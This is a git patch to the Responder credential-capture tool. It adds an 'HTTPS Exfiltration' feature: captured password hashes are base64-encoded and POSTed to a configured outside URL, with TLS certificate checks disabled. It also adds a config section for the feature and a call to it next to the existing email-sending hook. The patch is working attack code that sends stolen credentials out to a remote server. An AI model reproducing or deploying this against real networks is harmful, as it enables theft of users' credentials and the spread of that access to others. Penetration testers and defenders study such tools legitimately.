From 408e017377153c428e00552111339f004ae08c9c Mon Sep 17 00:00:00 2001
From: deadjakk <deadjakk@shell.rip>
Date: Wed, 2 Jun 2021 02:16:36 -0500
Subject: [PATCH] Added HTTPS Exfiltration which sends newly found hsahes as a
 POST request to the specified URL

---
 Responder.conf |  5 +++++
 settings.py    | 17 +++++++++++------
 utils.py       | 28 ++++++++++++++++++++++++++++
 3 files changed, 44 insertions(+), 6 deletions(-)

diff --git a/Responder.conf b/Responder.conf
index 5871f68..a56deac 100644
--- a/Responder.conf
+++ b/Responder.conf
@@ -108,3 +108,8 @@ username=sendingaddress@domain.com
 password=passwordtoemail
 port=587
 server=mail.domain.com
+
+[HTTPS Exfiltration]
+enabled=On
+url=https://domain.com:9090
+verifyssl=Off
diff --git a/settings.py b/settings.py
index 84fd987..44ba7e7 100644
--- a/settings.py
+++ b/settings.py
@@ -84,13 +84,18 @@ class Settings:
 		config = ConfigParser.ConfigParser()
 		config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
 
+		# HTTPS Exfiltration
+		self.httpsexfil_enabled  = self.toBool(config.get('HTTPS Exfiltration','enabled'))
+		self.httpsexfil_url      = config.get('HTTPS Exfiltration','url')
+		self.httpsexfil_verify  = self.toBool(config.get('HTTPS Exfiltration','verifyssl'))
+
 		# Email
-		self.emailenabled = self.toBool(config.get('Email', 'enabled'))
-		self.emailserver = config.get('Email', 'server')
-		self.emailport = config.get('Email', 'port')
-		self.emailpassword = config.get('Email', 'password')
-		self.emailusername = config.get('Email', 'username')
-		self.emailsendto = config.get('Email', 'sendtoaddress')
+		self.emailenabled     = self.toBool(config.get('Email', 'enabled'))
+		self.emailserver      = config.get('Email', 'server')
+		self.emailport        = config.get('Email', 'port')
+		self.emailpassword    = config.get('Email', 'password')
+		self.emailusername    = config.get('Email', 'username')
+		self.emailsendto      = config.get('Email', 'sendtoaddress')
 
 		# Servers
 		self.HTTP_On_Off     = self.toBool(config.get('Responder Core', 'HTTP'))
diff --git a/utils.py b/utils.py
index 264dc71..7bf6f91 100644
--- a/utils.py
+++ b/utils.py
@@ -26,6 +26,31 @@ import codecs
 import struct
 from calendar import timegm
 
+def HTTPExfil(result):
+    result = str(result)
+    try:
+        if not settings.Config.httpsexfil_enabled:
+            return
+        # requests isn't in stdlib, so using urllib
+        import urllib.parse 
+        import urllib.request
+        import ssl
+        import base64
+        ctx = ssl.create_default_context()
+        if not settings.Config.httpsexfil_verify:
+            ctx.check_hostname = False
+            ctx.verify_mode = ssl.CERT_NONE
+
+        data = {
+            'hashes' : base64.b64encode(result.encode()),
+        }
+        data = bytes( urllib.parse.urlencode( data ).encode() )
+        handler = urllib.request.urlopen( settings.Config.httpsexfil_url, data , context=ctx)
+        print(color("[HTTPS Exfil]",3,1),"Sent via https exfil")
+    except Exception as e:
+        print(color("[HTTPS Exfil]",1),"Error sending via HTTPS Exfil{}".format(e))
+        return
+
 def EmailHash(result):
     import smtplib
     if not settings.Config.emailenabled:
@@ -311,6 +336,9 @@ def SaveToDb(result):
 
 		# Email to desired email address
 		EmailHash(str(result))
+
+		# Send via POST to HTTPS server
+		HTTPExfil(result)
         
 	elif len(result['cleartext']):
 		print(color('[*] Skipping previously captured cleartext password for %s' % result['user'], 3, 1))